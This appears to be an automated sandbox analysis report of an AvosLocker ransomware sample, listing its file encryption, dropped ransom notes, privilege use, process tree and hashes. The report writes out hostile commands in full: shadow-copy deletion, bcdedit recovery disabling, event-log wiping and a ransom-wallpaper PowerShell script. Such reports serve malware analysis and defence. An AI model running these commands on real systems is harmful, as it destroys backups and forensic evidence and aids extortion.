C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 353f9ce8c0e8885e6891672572b4930a
SHA1 9bf169ad078b3066f73676abf564f765cec8f19b
SHA256 56e9074306009b63e84682e5983171dac9f163fffbbc2bf22b580e5908b42c93
SHA512 e2f8f55cabf8d0c7e9393332f0e82c0442518405badd2aa1c9de9df470d1f9b9de512f9bffc641f51b218a5ae3c4414a063c5198cfabd51e0446e0a8b32150c3

memory/3484-24588-0x000000001B670000-0x000000001B952000-memory.dmp

memory/3484-24589-0x0000000000400000-0x0000000000408000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-09 08:44

Reported

2024-09-09 08:47

Platform

win10v2004-20240802-en

Max time kernel

93s

Max time network

134s

Command Line

"C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (8494) files with added filename extension

ransomware

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\596685974.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sk-sk\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ca-es\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL105.XML C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusDemoR_BypassTrial365-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ru.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sv-se\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\example_icons2x.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\core_icons.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-16_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\plugin.js C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\Doughboy.scale-150.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\rsod\office32mui.msi.16.en-us.tree.dat C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Yahoo-Dark.scale-100.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Generic-Light.scale-300.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Windows Media Player\es-ES\wmplayer.exe.mui C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\ShouldNotExist.snippets.ps1xml C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\en-US\wmpnssui.dll.mui C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\EBWebView\x64\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\en-GB.pak.DATA C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\models\Email.model C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\Microsoft Office\Updates\Download\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp5-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\ui-strings.js C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\EmptyCalendarSearch.scale-125.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailSmallTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLENDS\BLENDS.ELM C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vreg\officemuiset.msi.16.en-us.vreg.dat C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\Microsoft Office\root\Templates\1033\ONENOTE\16\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\go-mobile-2x.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\en-us\AppStore_icon.svg C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Advanced-Dark.scale-250.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest1-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\GostName.XSL C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\fr-FR\MSFT_PackageManagement.strings.psd1 C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\da-dk\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\nl-nl\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ICE\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_OEM_Perp-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\it.pak.DATA C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hr-hr\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\selection-actions.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\ContactPhoto.scale-180.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ar-ae\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BOLDSTRI\PREVIEW.GIF C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\rsod\powerview.x-none.msi.16.x-none.tree.dat C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\uk-UA\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.scale-125.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\rsod\osmuxmui.msi.16.en-us.boot.tree.dat C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\is.pak C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\pt-br\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-cn\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\css\main.css C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\sv-se\ui-strings.js C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\nb.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\de-de\ui-strings.js C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\de-de\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 976 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 976 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 976 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 976 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 976 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 976 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 976 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 976 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 976 wrote to memory of 3424 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 976 wrote to memory of 3424 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 3620 wrote to memory of 36952 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3620 wrote to memory of 36952 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2396 wrote to memory of 36968 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2396 wrote to memory of 36968 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1324 wrote to memory of 36960 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\BackgroundTransferHost.exe
PID 1324 wrote to memory of 36960 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\BackgroundTransferHost.exe
PID 2212 wrote to memory of 12804 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2212 wrote to memory of 12804 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3424 wrote to memory of 12832 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3424 wrote to memory of 12832 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 976 wrote to memory of 35884 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 976 wrote to memory of 35884 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 35884 wrote to memory of 36264 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 35884 wrote to memory of 36264 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 35884 wrote to memory of 36760 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 35884 wrote to memory of 36760 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe

"C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\596685974.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 42.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp

Files

F:\GET_YOUR_FILES_BACK.txt

MD5 01188d22b1675e3437b1418e14f4ffab
SHA1 6e7127f3bbfce49485ed8f1acf8f697bcb952818
SHA256 e4b3ac00a0b2eb195b26abffbc4368077384e73393e51605edda17dae05ab7f2
SHA512 6903ae3247f32ad79c60a2062cd6a7bdbf5a7c9db1bdc43bdbef4da3396945014d30968ea4c8531a2d0c7b695f1ea36e2b8c51bb39cc6157c4096ac04a6e187d

memory/12832-17651-0x00000218DDA90000-0x00000218DDAB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ftdoggch.a3o.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
